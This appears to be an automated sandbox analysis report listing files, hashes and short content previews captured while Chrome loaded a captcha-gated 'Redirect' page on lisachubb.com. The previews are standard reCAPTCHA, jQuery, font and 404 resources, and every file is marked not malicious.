                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                      Category:dropped
                                                      Size (bytes):31128
                                                      Entropy (8bit):7.972256665523546
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:3F1763C0F51689EFC5BB3FA651EF3B5D
                                                      SHA1:259796984B3E00F9EB79F5D77B67A47CFB5C0D3F
                                                      SHA-256:01A3762D3F99E3F2ECC425277DEB852D989FA51362A0452879FA7BE7EA68FA25
                                                      SHA-512:EBC8DECA704B32F81919A018474335A707691CA0E45A412F4DD9CDDA4AECB00D80A1CAB392FA9BEE481E6D172F566BD2E53F1578BAADFF1EB236AA4CC5793542
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (594)
                                                      Category:downloaded
                                                      Size (bytes):561652
                                                      Entropy (8bit):5.637398859811323
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:A3BA6F3831DFAC23271ED79DB3467B14
                                                      SHA1:2F93EAE45276ABDCF26B684EF45036C7BF0D7F61
                                                      SHA-256:9C60F375BB60B19DC9BB69D9F8ABC316D7652A2F088B26C42FCCBDFC15E6FF6A
                                                      SHA-512:5583D01793029A9CC82260B74200812CBDB58CB715F20CCADD5AF76BCD7D561ACBABED018D3107951069AFFF11DC9A3D63A65F6AD17AC263FC0FFB8BECD9CFD1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.gstatic.com/recaptcha/releases/hbAq-YhJxOnlU-7cpgBoAJHb/recaptcha__en.js
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):78627
                                                      Entropy (8bit):6.021120116946511
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:ADA37A51F2C5A7FC2D0A7E8E01EE2089
                                                      SHA1:74095BB0EAA20A9B7636FD4E9361FB41115A5CBC
                                                      SHA-256:CC4B8A3C3CBB7F77DBC336386223EB1E26DC401A9D754E8630EE0989846261A4
                                                      SHA-512:B662657A20453A1F8E06557F06309C6C213E487C52E5D02A4DCA6EA5BAB9D39F7E1953DEA4B013F52782BC78C0DC2CD03EAE3526C66B4FA62E833B2D02D9A08D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.gstatic.com/recaptcha/releases/hbAq-YhJxOnlU-7cpgBoAJHb/styles__ltr.css
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 12 x 91, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):61
                                                      Entropy (8bit):4.068159130770306
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:4BF8E4B310D5A13AE1FDC82F4846AA21
                                                      SHA1:BB76B86CCE6DC6370F959C8C66CEB15E04A4FC4E
                                                      SHA-256:F7EE60943440B79ED8A6BA154B11C40D58F11945618E2D9D5265F442DC94717E
                                                      SHA-512:D054525C9EDC3870F3983493CDB25B939484A2F509CB1AE3AA031B6EB6C6F95D2E5BDEED75377F54777C117D3CDF94207166C36840BD43BBB400A7087B1AA981
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):600
                                                      Entropy (8bit):7.391634169810707
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:0F2A4639B8A4CB30C76E8333C00D30A6
                                                      SHA1:57E273A270BB864970D747C74B3F0A7C8E515B13
                                                      SHA-256:44B988703019CD6BFA86C91840FECF2A42B611B364E3EEA2F4EB63BF62714E98
                                                      SHA-512:3EA72C7E8702D2E9D94B0FAA6FA095A33AB8BC6EC2891F8B3165CE29A9CCF2114FAEF424FA03FD4B9D06785326284C1BB2087CE05E249CCAC65418361BFA7C51
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.gstatic.com/recaptcha/api2/refresh_2x.png
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):665
                                                      Entropy (8bit):7.42832670119013
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:07BF314AAB04047B9E9A959EE6F63DA3
                                                      SHA1:17BEF6602672E2FD9956381E01356245144003E5
                                                      SHA-256:55EAF62CB05DA20088DC12B39D7D254D046CB1FD61DDF3AE641F1439EFD0A5EE
                                                      SHA-512:2A1D4EBC7FBA6951881FD1DDA745480B504E14E3ADAC3B27EC5CF4045DE14FF030D45DDA99DC056285C7980446BA0FC37F489B7534BE46107B21BD43CEE87BA0
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 15340, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):15340
                                                      Entropy (8bit):7.983406336508752
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:19B7A0ADFDD4F808B53AF7E2CE2AD4E5
                                                      SHA1:81D5D4C7B5035AD10CCE63CF7100295E0C51FDDA
                                                      SHA-256:C912A9CE0C3122D4B2B29AD26BFE06B0390D1A5BDAA5D6128692C0BEFD1DFBBD
                                                      SHA-512:49DA16000687AC81FC4CA9E9112BDCA850BB9F32E0AF2FE751ABC57A8E9C3382451B50998CEB9DE56FC4196F1DC7EF46BBA47933FC47EB4538124870B7630036
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBBc4.woff2
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                      Category:downloaded
                                                      Size (bytes):2529
                                                      Entropy (8bit):5.033240050231006
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:6798C0A6B8F2890E24E831ED68F5EE43
                                                      SHA1:F24447027BB83B7CCDB6B3871A3536E04187835A
                                                      SHA-256:17576C38E550862EAF08B14550BE1E5D1A0D1F2B58490D6568DA084EC6E98583
                                                      SHA-512:FB68D0B66E7312E6E0A03268854504825A37655641F3C22E01A69E6CE0A880EBCB8B7FB7E1D4E10A3865978E35B93F199A100E730464E236013C3F79917EEB47
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lisachubb.com/jsuhsks/
                                                      Preview:<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Redirect</title>.. <script src='https://www.google.com/recaptcha/api.js' async defer></script>....</head>..<style>.. .loader {.. border: 6px solid #f3f3f3; /* Light grey */.. border-top: 6px solid #3498db; /* Blue */.. border-radius: 50%;.. width: 30px;.. height: 30px;.. animation: spin 1s linear infinite;.. display: none;..}....@keyframes spin {.. 0% { transform: rotate(0deg); }.. 100% { transform: rotate(360deg); }..}..</style>..<body>.. <div>.. <div style="display: flex; justify-content: center; align-items: center; margin-top: 30px;" id="captcha">.. <div>.. <div class="g-recaptcha" data-sitekey="6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU"></div>.. <div id="g-recaptcha-error" style="height: 20px; font-size: 12px; margin-top: 5px;" ></div>.. <div style="text-align: center;"><
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2228
                                                      Entropy (8bit):7.82817506159911
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:EF9941290C50CD3866E2BA6B793F010D
                                                      SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                      SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                      SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (1483), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):1483
                                                      Entropy (8bit):5.7875563041545055
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:706565706AA6D0458E9700A72BD5F5CA
                                                      SHA1:5B836D6D834C0966C582D32225A723B95B789119
                                                      SHA-256:19280E7EDFECD26A62EF9E7E88235DA48077622ADF4F9AD6EA9738CB01D0A60D
                                                      SHA-512:3EF6701A97EC35D42253C61D2F24414CEE91C69ABB7764DB9E16CC0428907E7EDF1670A339F6581B2923585B8FBBE2B6B4321E1903E1E041E6FEBA9507094019
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.google.com/recaptcha/api.js
                                                      Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');(cfg['clr']=cfg['clr']||[]).push('true');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A7vZI3v+Gz7JfuRolKNM4Aff6zaGuT7X0mf3wtoZTnKv6497cVMnhy03KDqX7kBz/q/iidW7srW31oQbBt4VhgoAAACUeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJEaXNhYmxlVGhpcmRQYXJ0eVN0b3JhZ2VQYXJ0aXRpb25pbmczIiwiZXhwaXJ5IjoxNzU3OTgwODAwLCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlfQ==';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='tre
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):530
                                                      Entropy (8bit):7.2576396280117494
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:88E0F42C9FA4F94AA8BCD54D1685C180
                                                      SHA1:5AD9D47A49B82718BAA3BE88550A0B3350270C42
                                                      SHA-256:89C62095126FCA89EA1511CF35B49B8306162946B0C26D6F60C5506C51D85992
                                                      SHA-512:FAFF842E9FF4CC838EC3C724E95EEE6D36B2F8C768DC23E48669E28FC5C19AA24B1B34CF1DBCBE877B3537D6A325B4C35AF440C2B6D58F6A77A04A208D9296F8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.gstatic.com/recaptcha/api2/audio_2x.png
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):61
                                                      Entropy (8bit):3.990210155325004
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):937
                                                      Entropy (8bit):7.737931820487441
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:FC3B7BBE7970F47579127561139060E2
                                                      SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                      SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                      SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65447)
                                                      Category:downloaded
                                                      Size (bytes):89501
                                                      Entropy (8bit):5.289893677458563
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):102
                                                      Entropy (8bit):4.831369400999319
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:E8FEA68FC4F3BAD81518A42FF35F72A9
                                                      SHA1:2C32B99F6C1675CC7F0ED5C0C323C5192726D558
                                                      SHA-256:B67733509D82D3AA189D99FA0FA466B48B82265B9A701CB150410CBF35F55AAB
                                                      SHA-512:75F295EC1AAEC9C754665E3D73DFDE9B725C4FD237E2A2DE83A693069B4C03F1FCD6DB9CD692D610F517531E582CAEB87AF9E1C9AFC0DD32E59FEAEDBED913F8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb
                                                      Preview:importScripts('https://www.gstatic.com/recaptcha/releases/hbAq-YhJxOnlU-7cpgBoAJHb/recaptcha__en.js');
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):15552
                                                      Entropy (8bit):7.983966851275127
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                      SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                      SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                      SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                      Category:downloaded
                                                      Size (bytes):15344
                                                      Entropy (8bit):7.984625225844861
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                      SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                      SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                      SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text
                                                      Category:downloaded
                                                      Size (bytes):315
                                                      Entropy (8bit):5.0572271090563765
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                      SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                      SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                      SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://lisachubb.com/favicon.ico
                                                      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                      No static file info